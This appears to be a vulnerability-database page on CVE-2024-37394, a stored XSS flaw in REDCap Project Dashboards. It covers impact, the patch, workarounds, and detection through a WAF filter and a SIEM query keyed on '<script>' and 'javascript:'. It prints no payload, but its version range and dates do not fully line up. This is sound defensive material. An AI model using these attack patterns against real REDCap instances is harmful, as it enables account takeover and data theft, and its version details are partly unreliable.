Login Sign Up

CVE-2024-37394

5.4 MEDIUM
Cross-Site Scripting

📋 TL;DR

This stored XSS vulnerability in REDCap allows authenticated users to inject malicious scripts into Project Dashboards via title and content fields. When other users view these dashboards, the scripts execute in their browser context. All REDCap instances running vulnerable versions are affected.

💻 Affected Systems

Products:
  • REDCap
Versions: 13.1.9 and earlier versions with Project Dashboards feature
Operating Systems: All platforms running REDCap
Default Config Vulnerable: ⚠️ Yes
Notes: Requires authenticated user access to Project Dashboards feature

📦 What is this software?

Redcap by Vanderbilt

View all CVEs affecting Redcap →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal session cookies, perform actions as other users, redirect to malicious sites, or deploy ransomware payloads through the trusted REDCap interface.

🟠

Likely Case

Authenticated attackers could steal credentials, manipulate data, or perform limited account takeover against users who view their malicious dashboards.

🟢

If Mitigated

With proper input validation and output encoding, malicious scripts would be rendered harmless as plain text rather than executable code.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated access but is straightforward once authenticated

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 14.2.1 or later

Vendor Advisory: https://www.evms.edu/research/resources_services/redcap/redcap_change_log/

Restart Required: Yes

Instructions:

1. Backup REDCap database and files. 2. Download REDCap 14.2.1 or later. 3. Follow REDCap upgrade instructions. 4. Restart web server. 5. Verify dashboard functionality.

🔧 Temporary Workarounds

Disable Project Dashboards

all

Temporarily disable the Project Dashboards feature to prevent exploitation

Modify REDCap configuration to disable dashboard functionality

Implement WAF Rules

all

Add web application firewall rules to block XSS payloads in dashboard fields

Configure WAF to filter <script>, javascript:, and other XSS patterns

🧯 If You Can't Patch

  • Implement strict input validation on dashboard title and content fields
  • Apply output encoding to all user-controlled content displayed in dashboards

🔍 How to Verify

Check if Vulnerable:

Check if REDCap version is 13.1.9 or earlier and Project Dashboards feature is enabled

Check Version:

Check REDCap Control Center or database version table

Verify Fix Applied:

Verify REDCap version is 14.2.1 or later and test dashboard fields with XSS payloads

📡 Detection & Monitoring

Log Indicators:

  • Unusual dashboard creation/modification patterns
  • Long or encoded strings in dashboard fields
  • Multiple failed XSS attempts

Network Indicators:

  • Unexpected external connections from REDCap dashboard pages
  • Script tags in dashboard content requests

SIEM Query:

source="redcap_logs" AND (dashboard_title CONTAINS "<script>" OR dashboard_content CONTAINS "javascript:")

📊 Metadata

CVE ID: CVE-2024-37394
CVSS v3 Score: 5.4 (MEDIUM)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
EPSS Score: 0.26% exploit probability (48.9th percentile)
Published: June 10, 2025
Last Updated: June 16, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-37394, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)